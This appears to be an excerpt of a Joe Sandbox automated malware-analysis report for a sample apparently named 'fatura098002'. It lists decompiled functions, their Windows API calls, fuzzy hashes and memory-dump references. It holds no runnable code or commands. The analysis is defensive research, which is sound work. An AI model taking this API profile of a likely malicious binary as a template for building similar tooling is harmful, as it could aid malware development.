Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0cf8e91a6e0572fe97eb19c511c6c1ba92ad1f7a48002957f76679db5c9f1c90
Instruction ID: 20b95d5dd85ecc077f7056abf71e62bc48ea07b24a6194aae2275c3bb9cf3852
Opcode Fuzzy Hash: 0cf8e91a6e0572fe97eb19c511c6c1ba92ad1f7a48002957f76679db5c9f1c90
Instruction Fuzzy Hash: 2A11573A901219FFEB10DBA4CD88FADBB78EB08350F204092EA01B7290C6716E50DB94

Function 0076E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0076E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0076E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0076E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0076E24D

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 4bbe011e20ebec5b77297f0d18a203d64743bd4913abe51d71851b1404ca808d
Instruction ID: 4bacd2118daf286fbfcd0e6d44b48b1c2a39d2f7fe355812179c73b47737ebe3
Opcode Fuzzy Hash: 4bbe011e20ebec5b77297f0d18a203d64743bd4913abe51d71851b1404ca808d
Instruction Fuzzy Hash: 8A112B76904218BFCB019FA8DC09A9E7FBDBB45310F008216F815E3290D278CD0487B4

Function 0072D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0072CFF9,00000000,00000004,00000000), ref: 0072D218
GetLastError.KERNEL32 ref: 0072D224
__dosmaperr.LIBCMT ref: 0072D22B
ResumeThread.KERNEL32(00000000), ref: 0072D249

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 5d540d15dbec1ab67dc6ceb561568b74d411f08a67a9a2c69e84cc2bebd6b3ce
Instruction ID: c8c4f5d38273c8ba05d9975d12025ef79a20f12cd42e320264237d46dee50443
Opcode Fuzzy Hash: 5d540d15dbec1ab67dc6ceb561568b74d411f08a67a9a2c69e84cc2bebd6b3ce
Instruction Fuzzy Hash: E901D676405128FBDB315BA5EC0DBAE7AADEF81330F104219F925921D0DB788D01C6A1

Function 0070600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0070604C
GetStockObject.GDI32(00000011), ref: 00706060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0070606A

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: a7c9cb78151bf32709c542e41059ae788d1f78b8fd3da8ac141bec287c2f8e83
Instruction ID: 72afda662a3520c4ab8e3e3c9355f02ffbab305ef4e5a9aae1b4dc209bb418a4
Opcode Fuzzy Hash: a7c9cb78151bf32709c542e41059ae788d1f78b8fd3da8ac141bec287c2f8e83
Instruction Fuzzy Hash: 97116D72541549FFEF128FA4DC64EEABBA9EF083A4F044216FA1452150D73A9C60EBA4

Function 00723B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00723B56

Part of subcall function 00723AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00723AD2
Part of subcall function 00723AA3: ___AdjustPointer.LIBCMT ref: 00723AED

_UnwindNestedFrames.LIBCMT ref: 00723B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00723B7C
CallCatchBlock.LIBVCRUNTIME ref: 00723BA4

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 3f8baac40f38f05141233b87a149fcfa5c20654ca4bafea4f94e70eee5f90325
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 55012972100158FBDF126E95EC46EEB3F7AEF48754F044018FE4856121C73AE961DBA0

Function 00733073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007013C6,00000000,00000000,?,0073301A,007013C6,00000000,00000000,00000000,?,0073328B,00000006,FlsSetValue), ref: 007330A5
GetLastError.KERNEL32(?,0073301A,007013C6,00000000,00000000,00000000,?,0073328B,00000006,FlsSetValue,007A2290,FlsSetValue,00000000,00000364,?,00732E46), ref: 007330B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0073301A,007013C6,00000000,00000000,00000000,?,0073328B,00000006,FlsSetValue,007A2290,FlsSetValue,00000000), ref: 007330BF

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: c6e5724527668037853f175e0750caa3a327bfb69454da8bae72a6373c1243e8
Instruction ID: 3022bb7469cbd66ce67bcb950f19e04f722b65e496c298385037cbf0176e00ce
Opcode Fuzzy Hash: c6e5724527668037853f175e0750caa3a327bfb69454da8bae72a6373c1243e8
Instruction Fuzzy Hash: 50017B32301626ABEF354B78AC84A577B9AAF05B71F204721F945E7251C72DD902C6E4

Function 00767464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0076747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00767497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007674AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 007674CA

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 52c03e1507d2cded980d9b042d2fceb837dda005c6ccc00218b1446cb7b96531
Instruction ID: 0ad3c6c9393692007e18a1596deb9523e99bf0cde74e1239a4af972b38740db1
Opcode Fuzzy Hash: 52c03e1507d2cded980d9b042d2fceb837dda005c6ccc00218b1446cb7b96531
Instruction Fuzzy Hash: 7711A1B52053549BE7208F14DD0CB927FFCEB40B98F10856AAA17D6151DB78E904DB60

Function 0076B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0076ACD3,?,00008000), ref: 0076B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0076ACD3,?,00008000), ref: 0076B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0076ACD3,?,00008000), ref: 0076B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0076ACD3,?,00008000), ref: 0076B126

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 3e59085e5d376121402187c76842930da221c75eb1fe219da0e12633d783d124
Instruction ID: 1a9451094f81d5d6e5ab67c9d289fd7329f3422aaee44e00900099632ab802c2
Opcode Fuzzy Hash: 3e59085e5d376121402187c76842930da221c75eb1fe219da0e12633d783d124
Instruction Fuzzy Hash: 42115E71C0151CE7CF049FE4D9596EEBF78FF0B711F108086D942B2285CB3895918B59

Function 00762DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00762DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00762DD6
GetCurrentThreadId.KERNEL32 ref: 00762DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00762DE4

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 03422e342c3f9145e9935a2e07e4a22f27996371674e1c5d2638c248374b357d
Instruction ID: 25b0e48290dbc2355d109aae4d31432272ab549560567eb437af8fd788b1126e
Opcode Fuzzy Hash: 03422e342c3f9145e9935a2e07e4a22f27996371674e1c5d2638c248374b357d
Instruction Fuzzy Hash: DAE092712016247BDF211B729C0EFEB3E7CEF42BA1F404416F506D10919BA9C842C6B5

Function 00798863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00719639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00719693
Part of subcall function 00719639: SelectObject.GDI32(?,00000000), ref: 007196A2
Part of subcall function 00719639: BeginPath.GDI32(?), ref: 007196B9
Part of subcall function 00719639: SelectObject.GDI32(?,00000000), ref: 007196E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00798887
LineTo.GDI32(?,?,?), ref: 00798894
EndPath.GDI32(?), ref: 007988A4
StrokePath.GDI32(?), ref: 007988B2

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 0a42ba464e5e794b0e87fb72becae56d16ca145a12210e868f7ee727235aca47
Instruction ID: e7bbba84e4f55c959552ea35b84b1919ee8d72743b4f2305948925ceff0b044c
Opcode Fuzzy Hash: 0a42ba464e5e794b0e87fb72becae56d16ca145a12210e868f7ee727235aca47
Instruction Fuzzy Hash: 31F03A36042258FADF136F98AC09FCA3B69AF06310F44C002FA11651E1C77D5552CBB9

Function 007198B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 007198CC
SetTextColor.GDI32(?,?), ref: 007198D6
SetBkMode.GDI32(?,00000001), ref: 007198E9
GetStockObject.GDI32(00000005), ref: 007198F1

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 62618496d28efd6ac3c096742d3b4327016c30edf44c50cae7cc6329bbf09045
Instruction ID: 15e68ab3c58930be76ac6af3996a610916851c1ef10c88db564f42c229a39bc6
Opcode Fuzzy Hash: 62618496d28efd6ac3c096742d3b4327016c30edf44c50cae7cc6329bbf09045
Instruction Fuzzy Hash: 82E06531284284ABDF225B74BC09BD83F10AB11336F14C21AF7FA540E1C7794656DB14

Function 0076162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00761634
OpenThreadToken.ADVAPI32(00000000,?,?,?,007611D9), ref: 0076163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007611D9), ref: 00761648
OpenProcessToken.ADVAPI32(00000000,?,?,?,007611D9), ref: 0076164F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 30bf8eace3dae4a93af4361685729c29f51ab4f99fd6709d11b833bb4a2f5e20
Instruction ID: 0c2e4cfa597e0e3411580e25f532644ef8cf8820496d27ecc877e1a842812c6c
Opcode Fuzzy Hash: 30bf8eace3dae4a93af4361685729c29f51ab4f99fd6709d11b833bb4a2f5e20
Instruction Fuzzy Hash: 21E08635601211EBDF201FA49E0DB463B7CAF44791F18C809F646C9080DA3C4442C768

Function 0075D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0075D858
GetDC.USER32(00000000), ref: 0075D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0075D882
ReleaseDC.USER32(?), ref: 0075D8A3

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 23b1581d8d9d1a30e6fa2b93666892ecae3ec29f0f12cf3fbad58d308313c78a
Instruction ID: f47d573fff518af89bf55fa3b0d2f6811fafa02b824f14156a70862413eb15e0
Opcode Fuzzy Hash: 23b1581d8d9d1a30e6fa2b93666892ecae3ec29f0f12cf3fbad58d308313c78a
Instruction Fuzzy Hash: 61E01AB1800205DFCF529FA4D80C66DBBB1FB08311F14C00AE806E7250CB3D9942AF54

Function 0075D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0075D86C
GetDC.USER32(00000000), ref: 0075D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0075D882
ReleaseDC.USER32(?), ref: 0075D8A3

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 0ae27204c297f884f63bb905192d63c1c6c551556baa136d3b2f46a58b97e250
Instruction ID: 1bd49285ec1dcac16ae3defd51bfe333b6bf036ecafa7a60a0fcce168119a79c
Opcode Fuzzy Hash: 0ae27204c297f884f63bb905192d63c1c6c551556baa136d3b2f46a58b97e250
Instruction Fuzzy Hash: EAE092B5800205EFCF52AFA4D80C66DBBB5BB08311F14954AE94AE7290DB3DA942AF54

Function 00774D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00707620: _wcslen.LIBCMT ref: 00707625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00774ED4

Strings

LPT, xrefs: 00774DFB
*, xrefs: 00774E10

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 085489a7067da4b08aede90b51c4d142842b3d69728d0e18598a2c1a725153fa
Instruction ID: b0f2c859766c723bc7f89178c1f748a75014b4b0916faa8eb4456d96c1671e09
Opcode Fuzzy Hash: 085489a7067da4b08aede90b51c4d142842b3d69728d0e18598a2c1a725153fa
Instruction Fuzzy Hash: F5914F75A00204DFCB14DF58C484EAABBF1AF45354F19C099E40A9F3A2D779ED85CB91

Function 0072E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0072E30D

Strings

pow, xrefs: 0072E2E5, 0072E302

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
